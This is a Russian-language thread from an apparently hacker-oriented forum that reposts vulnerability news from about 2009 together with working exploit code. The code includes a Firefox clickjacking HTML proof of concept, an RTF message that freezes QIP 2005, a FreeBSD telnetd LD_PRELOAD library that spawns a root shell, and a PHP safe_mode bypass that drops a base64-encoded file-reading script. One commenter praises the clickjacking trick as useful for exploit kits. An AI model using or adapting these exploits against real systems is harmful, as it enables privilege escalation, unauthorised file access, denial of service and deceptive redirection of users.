• XSS.stack #1 – первый литературный журнал от юзеров форума

Новости уязвимостей

Digital Security открывает сайт своего исследовательского центра DSec Research Group

Cпециалисты DSec Research Group занимаются поиском и исследованием уязвимостей различных приложений и систем.
Digital Security - одна из ведущих российских консалтинговых компаний в области информационной безопасности. Digital Security более семи лет работает на рынке информационной безопасности на всей территории России, стран СНГ и Балтии. Все специалисты отдела аудита и аналитики имеют более чем пятилетний практический опыт выполнения работ в области ИБ, включая аудит на соответствие ISO 27001 и PCI DSS. Среди клиентов Digital Security такие компании, как: ТНК-BP, Альфа-Банк, РОСБАНК, холдинг «Металлоинвест» и многие другие.
Результаты работы DSecRG используются специалистами отдела аудита Digital Security при анализе защищенности информационных систем с применением методики активного аудита, а также при проведении тестов на проникновение. Благодаря этому анализ защищенности становится значительно более полным и глубоким, а разрабатываемые специалистами Digital Security рекомендации по устранению найденных уязвимостей - более эффективными.
Информация о найденных специалистами DSecRG уязвимостях публикуется в списках рассылки SecurityFocus, портале Milw0rm.com, а теперь и на открывшемся сайте DSecRG в виде отчетов об уязвимостях (advisory) и исследований (whitepapers). Также на новом сайте доступны эксплоиты, актуальные статьи специалистов DSecRG и наиболее интересные новости в области информационной безопасности.
Илья Медведовский, директор Digital Security:
«Мы открыли исследовательский центр год назад. За это время специалисты DSecRG неоднократно получали благодарность от таких компаний, как Oracle, SAP, Alcatel и разработчиков таких известных продуктов, как OpenBSD и RUBY. В первый юбилей DSecRG мы решили сделать наше внутреннее подразделение публичным и открыли его сайт, на котором будут публиковаться все результаты исследовательской работы специалистов DSecRG».
:zns2: http://www.dsecrg.ru/
 
Разработан метод проведения скрытой атаки на Mac Os X
mac_os_x_leopard_stacks-171007.jpg

Студент миланского политеха Винченцо Иоццо (Vincenzo Iozzo) обнаружил возможность проведения скрытой атаки на компьютеры, работающие под управлением Mac OS X. Разработанный им метод, будучи взят на вооружение злоумышленниками, сделает очень сложным сбор улик для доказательства взлома.
Иоццо потратил массу времени на изучение работы OS X с исполняемыми файлами формата Mach-O и сумел найти обходной путь для загрузки бинарного кода в оперативную память. Оказалось, что встроенная защита от атак, состоящая в случайном расположении исполняемого кода в памяти компьютера, уязвима, поскольку системный загрузчик динамических библиотек всегда расположен по одному и тому же адресу.
"Дыра" теоретически позволяет злоумышленнику запустить бинарный код не в отдельном процессе, как это делается при большинстве современных кибератак, а непосредственно в процессе атакуемого приложения. Это значит, что вредоносному коду нет необходимости обращаться к жёсткому диску компьютера, и следов поражения здесь не остается. Обнаружить заражение можно другими способами, которые, правда, не являются традиционными в судебной практике.
Метод Иоццо — это не способ взлома системы, а лишь способ сделать его незаметным. То есть злоумышленникам придётся использовать его совместно с другими вредоносными программами, которые умеют проникать в Mac OS X благодаря неизвестным или же непропатченным уязвимостям.
Иоццо собирается представить свою находку на очередной конференции по кибербезопасности Black Hat, которая пройдёт в следующем месяце в Вашингтоне. Иоццо поделился методом с известным специалистом в этой области Чарльзом Миллером (Charles Miller), который сумел оценить его по достоинству, отметив, что использование данного метода злоумышленниками — всего лишь вопрос времени.
"Его очень легко использовать, — говорит он. — Будь я плохим парнем, я бы его использовал. Если вы заинтересованы в том, чтобы скрывать свои действия, было бы глупо его не использовать".
Также Миллер признался, что в настоящий момент работает над адаптацией данного метода для iPhone
 
pifko12
Заинтригован. Учитывая что "трояны" в Mac OS X нужно устанавливать самому... мне очень интересно.

З.Ы. жить опасно...
Ты наверно не правильно понял :) Данная фишка не делает проникновение более легким или полностью "автоматизированным", просто эта методика помогает скрывать факт нападения вот и всё...
 
Firefox 3.0.5 Status Bar Obfuscation / Clickjacking

Код:
<html>
<body>
<div id="mydiv"
onmouseover="document.location='http://www.milw0rm.com';"
style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('mydiv').style.left=mouseX-1;
document.getElementById('mydiv').style.top=mouseY-1;
}
</script>
<center>


<font style="font-family:arial;font-size:32px">Status Bar Obfuscation
/ Clickjacking</font>

<font style="font-family:arial;font-size:24px">By MrDoug</font>



<hr size="3" width="500" color="#000000">


<font style="font-family:arial;font-size:20px">Click the VALID link to
google below to visit milw0rm.com</font>



<a href="http://www.google.com" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">http://www.google.com</font></a>



<hr size="3" width="500" color="#000000">


<font style="font-family:arial;font-size:16px">Greetz to Slappywag</font>

</center>
<div style="position:absolute;bottom:0;">
<font style="font-family:arial;font-size:32px">Note this...

      | 

     V
</font>
</div>
</body>
</html>
B)


Автор: MrDoug (mrdoug13[at]gmail[dot]com)
 
=) хех...

Ну это ты например видишь одну ссылку... (и "снизу" пишется эта ссылка) а при клике на эту ссыль... тебя уводит сосвсем на другую... при этом "внизу" пишется "Соединение с 1ой ссылкой" а выводит на 2ую... ясно? =)
Это особенно удобно для "связок"... т.к. они подгружают систему... и сразу думаешь что-то тут не так... а в этом случае ты кликнул на "чистую" ссылку гуугла смотришь грузится гугл, а на самом деле хз чё(хз какой сайт).

если нет... скажи... наскриню и подпишу :D
 
Уязвимость: QIP 2005 DoS.

1176378973_35.png

СПРАВКА:
QIP 2005 бесплатная программа с закрытым исходным кодом, альтернативный клиент мгновенного обмена сообщениями основана на протоколе OSCAR. Он имеет полную поддержку ICQ и экспериментальная поддержка AIM.

Оф.сайт:
www.qip.ru

УЯЗВИМЫЕ ВЕРСИИ:
QIP 2005 build 8082 (последняя версия)
Предыдущие версии также могут быть затронуты

ПОДРОБНОСТИ:
Злоумышленник может воспользоваться уязвимостью, отправив специально созданного сообщения в формате RTF. Сообщение может привести к "замораживанию" уязвимых приложений и использовать 100% CPU.
Пример:
{\rtf\pict\&&}
Возможно уязвимый код существует в TRichView компоненте, однако это не подтвердили.

ЭКСПЛУАТАЦИЯ:
Удаленный злоумышленник может воспользоваться этой уязвимостью с помощью любого программного обеспечения для обмена мгновенными сообщениями с OSCAR (ICQ) поддержка протокола, направив специально созданного сообщения в формате RTF.

Автор:
Максим Кулаков aka ShineShadow
 
Критическая уязвимость в FreeBSD 7.x

250px-FreeBSD_logo.png

В telnetd демоне, входящем в состав FreeBSD 7.x, обнаружена критическая уязвимость, позволяющая локальному злоумышленнику получить привилегии суперпользователя в системе. Предположительно проблеме подвержены OpenBSD, NetBSD и другие системы.

Эксплоит настолько прост, что вначале даже не верится, что он может работать. Уязвимость связана ненадлежащей чисткой переменных окружения перед вызовом /bin/login из telnetd (отсутствует чистка переменной окружения LD_PRELOAD, которую можно передать со стороны клиента, так как telnet протокол поддерживает передачу переменных окружения). Суть метода в подключении, через LD_PRELOAD простейшей библиотеки, запускающей /bin/sh в процедуре инициализации. Библиотека должна находиться на атакуемом хосте. При этом в момент подключения к локальному telnetd серверу, злоумышленник без аутентификации получает root shell.

Теоретически на основе данной проблемы можно реализовать и сценарий удаленной атаки (например, библиотека может быть загружена через анонимный FTP). Исправления уязвимости в настоящий момент не доступны, рекомендуется отключить telnet сервис, если он используется.

Код:
# FreeBSD telnetd local/remote privilege escalation/code execution
# remote root only when accessible ftp or similar available
# tested on FreeBSD 7.0-RELEASE
# by Kingcope/2009

#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
        FILE *f;
        setenv("LD_PRELOAD", "", 1);
        system("echo ALEX-ALEX;/bin/sh");
}

Подробности

источник: opennet.ru/linux.org.ru
 
Уязвимость нулевого дня в Microsoft Office Excel

25 февраля, 2009

Microsoft вчера опубликовала уведомление, предупреждающее пользователей об активной эксплуатации неизвестной уязвимости в Microsoft Excel. Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе. Для успешной эксплуатации уязвимости пользователь должен открыть специально сформированный .xls файл.

Уязвимые приложения:

Microsoft Office 2000
Microsoft Office XP
Microsoft Office 2003
Microsoft Office 2007
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Microsoft Office Excel Viewer
Microsoft Office Excel Viewer 2003
Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Service Pack 1

По данным Symantec уязвимость используется в целевых атаках троянским приложением Trojan.Mdropper.AC.

Microsoft предлагает следующее временное решение для снижения риска заражения системы:

Не открывать и не сохранять Excel файлы, полученные из недоверенных источников

Использовать Microsoft Office Isolated Conversion Environment (MOICE) при открытии файлов из недоверенных источников

Установка пакета MOICE возможна для Office 2003 и 2007. Для установки MOICE требуется наличие на системе пакета Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats. Пакет совместимости доступен по адресу
http://www.microsoft.com/downloads/details...&displaylang=en

Для включения MOICE требуется изменить зарегистрированные обработчики для форматов .xls, .xlt и .xla.
__________________________________________________________
Команда для включения MOICE | Команда для отключения MOICE

ASSOC .XLS=oice.excel.sheet | ASSOC .xls=Excel.Sheet.8

ASSOC .XLT=oice.excel.template | ASSOC .xlt=Excel.Template

ASSOC .XLA=oice.excel.addin | ASSOC .xla=Excel.Addin
__________________________________________________________

Примечание: для Windows Vista и Windows Server 2008 команды должны быть выполнены с повышенными привилегиями.

Подробные данные о MOICE доступны в базе знаний KB935865

Использовать политику блокировки файлов в Microsoft Office

Эта политика блокирует открытие файлов в формате Office 2003 и ниже для открытия из недоверенных источников. Для использования этого варианта требуется, чтобы все доступные исправления были установлены на системе.

Внимание! При включении политики необходимо прочитать статью из базы знаний KB922848. Если на системе не будет указана доверенная директория, пользователи не смогут открывать файлы Microsoft Excel.

Применение политики для Office 2003

Для включения политики необходимо внести следующие изменения в системный реестр:

Код:
[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\FileOpenBlock]
"BinaryFiles"=dword:00000001

Для отключения политики необходимо внести следующие изменения в системный реестр:

Код:
[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\FileOpenBlock]
"BinaryFiles"=dword:00000000

Применение политики для Office 2007

Для включения политики необходимо внести следующие изменения в системный реестр:

Код:
[HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\FileOpenBlock]
"BinaryFiles"=dword:00000001

Для отключения политики необходимо внести следующие изменения в системный реестр:

Код:
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\Excel\Security\FileOpenBlock]
"BinaryFiles"=dword:00000000

Источник: securitylab.ru

P.S. Для кого-то может и баян, но для меня новое)))
 
PHP 5.2.9 curl safe_mode & open_basedir bypass

Автор: Maksymilian Arciemowicz
Дата:
- - Dis.: 31.12.2008
- - Pub.: 10.04.2009

Описание: http://securityreason.com/achievement_securityalert/61

Exploit Code :

Код:
<?php
/* SecurityReason.com - Security Audit Stuff

PHP 5.2.9 curl safe_mode & open_basedir bypass
http://securityreason.com/achievement_securityalert/61

exploit from "SecurityReason - Security Audit" lab.
for legal use only

http://securityreason.com/achievement_exploitalert/11

author: Maksymilian Arciemowicz
cxib [a&t] securityreason [0.0] com

R.I.P. ladyBMS

*/

$freiheit=fopen('./cx529.php', 'w');

fwrite($freiheit, base64_decode("
PD9waHANCi8qDQpzYWZlX21vZGUgYW5kIG9wZW5fYmFzZWRpciBCeXBhc3MgUEhQIDUuMi45
DQpieSBNYWtzeW1pbGlhbiBBcmNpZW1vd2ljeiBodHRwOi8vc2VjdXJpdHlyZWFzb24uY29t
Lw0KY3hpYiBbIGEuVF0gc2VjdXJpdHlyZWFzb24gWyBkMHRdIGNvbQ0KDQpOT1RFOg0KaHR0
cDovL3NlY3VyaXR5cmVhc29uLmNvbS9hY2hpZXZlbWVudF9zZWN1cml0eWFsZXJ0LzYxDQoN
CkVYUExPSVQ6DQpodHRwOi8vc2VjdXJpdHlyZWFzb24uY29tL2FjaGlldmVtZW50X2V4cGxv
aXRhbGVydC8xMA0KKi8NCg0KaWYoIWVtcHR5KCRfR0VUWydmaWxlJ10pKSAkZmlsZT0kX0dF
VFsnZmlsZSddOw0KZWxzZSBpZighZW1wdHkoJF9QT1NUWydmaWxlJ10pKSAkZmlsZT0kX1BP
U1RbJ2ZpbGUnXTsNCg0KZWNobyAnPFBSRT48UD5UaGlzIGlzIGV4cGxvaXQgZnJvbSA8YQ0K
aHJlZj0iaHR0cDovL3NlY3VyaXR5cmVhc29uLmNvbS8iIHRpdGxlPSJTZWN1cml0eUF1ZGl0
Ij5TZWN1cml0eSBBdWRpdCAtIFNlY3VyaXR5UmVhc29uPC9hPiBsYWJzLg0KQXV0aG9yIDog
TWFrc3ltaWxpYW4gQXJjaWVtb3dpY3oNCjxwPlNjcmlwdCBmb3IgbGVnYWwgdXNlIG9ubHku
DQo8cD5QSFAgNS4yLjkgc2FmZV9tb2RlICYgb3Blbl9iYXNlZGlyIGJ5cGFzcw0KPHA+TW9y
ZTogPGEgaHJlZj0iaHR0cDovL3NlY3VyaXR5cmVhc29uLmNvbS8iPlNlY3VyaXR5UmVhc29u
PC9hPg0KPHA+PGZvcm0gbmFtZT0iZm9ybSIgYWN0aW9uPSJodHRwOi8vJy4kX1NFUlZFUlsi
SFRUUF9IT1NUIl0uaHRtbHNwZWNpYWxjaGFycygkX1NFUlZFUlsiU0NSSVBUX04NCkFNRSJd
KS4kX1NFUlZFUlsiUEhQX1NFTEYiXS4nIiBtZXRob2Q9InBvc3QiPjxpbnB1dCB0eXBlPSJ0
ZXh0IiBuYW1lPSJmaWxlIiBzaXplPSI1MCIgdmFsdWU9IicuaHRtbHNwZWNpYWxjaGFycygk
ZmlsZSkuJyI+PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0iaGFyZHN0eWxleiIgdmFsdWU9
IlNob3ciPjwvZm9ybT4nOw0KDQoNCiRsZXZlbD0wOw0KDQppZighZmlsZV9leGlzdHMoImZp
bGU6IikpDQoJbWtkaXIoImZpbGU6Iik7DQpjaGRpcigiZmlsZToiKTsNCiRsZXZlbCsrOw0K
DQokaGFyZHN0eWxlID0gZXhwbG9kZSgiLyIsICRmaWxlKTsNCg0KZm9yKCRhPTA7JGE8Y291
bnQoJGhhcmRzdHlsZSk7JGErKyl7DQoJaWYoIWVtcHR5KCRoYXJkc3R5bGVbJGFdKSl7DQoJ
CWlmKCFmaWxlX2V4aXN0cygkaGFyZHN0eWxlWyRhXSkpIA0KCQkJbWtkaXIoJGhhcmRzdHls
ZVskYV0pOw0KCQljaGRpcigkaGFyZHN0eWxlWyRhXSk7DQoJCSRsZXZlbCsrOw0KCX0NCn0N
Cg0Kd2hpbGUoJGxldmVsLS0pIGNoZGlyKCIuLiIpOw0KDQokY2ggPSBjdXJsX2luaXQoKTsN
Cg0KY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgImZpbGU6ZmlsZTovLy8iLiRmaWxl
KTsNCg0KZWNobyAnPEZPTlQgQ09MT1I9IlJFRCI+IDx0ZXh0YXJlYSByb3dzPSI0MCIgY29s
cz0iMTIwIj4nOw0KDQppZihGQUxTRT09Y3VybF9leGVjKCRjaCkpDQoJZGllKCc+U29ycnku
Li4gRmlsZSAnLmh0bWxzcGVjaWFsY2hhcnMoJGZpbGUpLicgZG9lc250IGV4aXN0cyBvciB5
b3UgZG9udCBoYXZlIHBlcm1pc3Npb25zLicpOw0KDQplY2hvICcgPC90ZXh0YXJlYT4gPC9G
T05UPic7DQoNCmN1cmxfY2xvc2UoJGNoKTsNCg0KPz4=
"));

fclose($freiheit);

echo "exploit has been generated . use cx529.php file";
?>
 
Ping of Death в OpenBSD Packet Filter

91c14def348b6bbc97880baa55ce2ec3.gif

Атакующий при помощи одного специально сформированного IP пакета может вызвать панику ядра (как из локальной сети, если используется правило NAT, так и извне, если используется правило RDR).

Баг проверен (эксплоит) на OpenBSD 4.3. Уязвимости подвержены все версии OpenBSD, в которые вошел PF.

Быстрый способ устранить проблему - указать явно список траслируемых протоколов в конфиге:
nat/rdr ... inet/inet6 proto { tcp udp icmp/icmp6 } ...

Код:
nmap -sO $some_host_so_that_the_firewall_handles_the_packets

Exploit ?
Patch

linux.org.ru
 
Уязвимость в ядре Linux позволяет получить повышенные привилегии (драйвер net/tun)

180px-Tux.svg.png
Автор проекта grsecurity, Brad Spengler, опубликовал эксплойт, использующий очень интересную уязвимость в ядре Linux (драйвер net/tun).

Специфика этой уязвимости состоит в том, что уязвимость отсутствует в исходном коде, но присутствует в бинарном. Как такое возможно? Давайте рассмотрим это на примере. Все начинается с того, что происходит инициализация указателя sk:
Код:
struct sock *sk = tun->sk;
Этот код не вызывает ошибок даже если tun == NULL, и не является сам по себе уязвимостью.

Несколькими строками ниже происходит проверка инициализации указателя tun:
Код:
if (!tun)
return POLLERR;
Казалось бы, теперь все правильно. Злодей не пройдет.

Но! При сборке кода компилятор полагает, что указатель tun уже корректно инициализирован и, оптимизируя код, выкидывает проверку факта инициализации (приведенный выше оператор if). Таким образом, ничто не мешает злоумышленнику заставить ядро обращаться по нулевому адресу. Имеем классическую null pointer dereference vulnerability.

Обнаруженная уязвимость позволяет злоумышленнику обойти ограничения SELinux/AppArmor, вызвать крах ядра либо выполнить произвольный код с рутовыми привилегиями.

Представленный сплойт протестирован на ядрах версий 2.6.30 с SELinux и без, а также на 2.6.18 (RHEL5, собирать с опцией -DRHEL5_SUCKS). Для успешной работы данного сплойта необходимо наличие на машине PulseAudio и подгруженного модуля tun.

Описание уязвимости | Скачать эксплоит
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх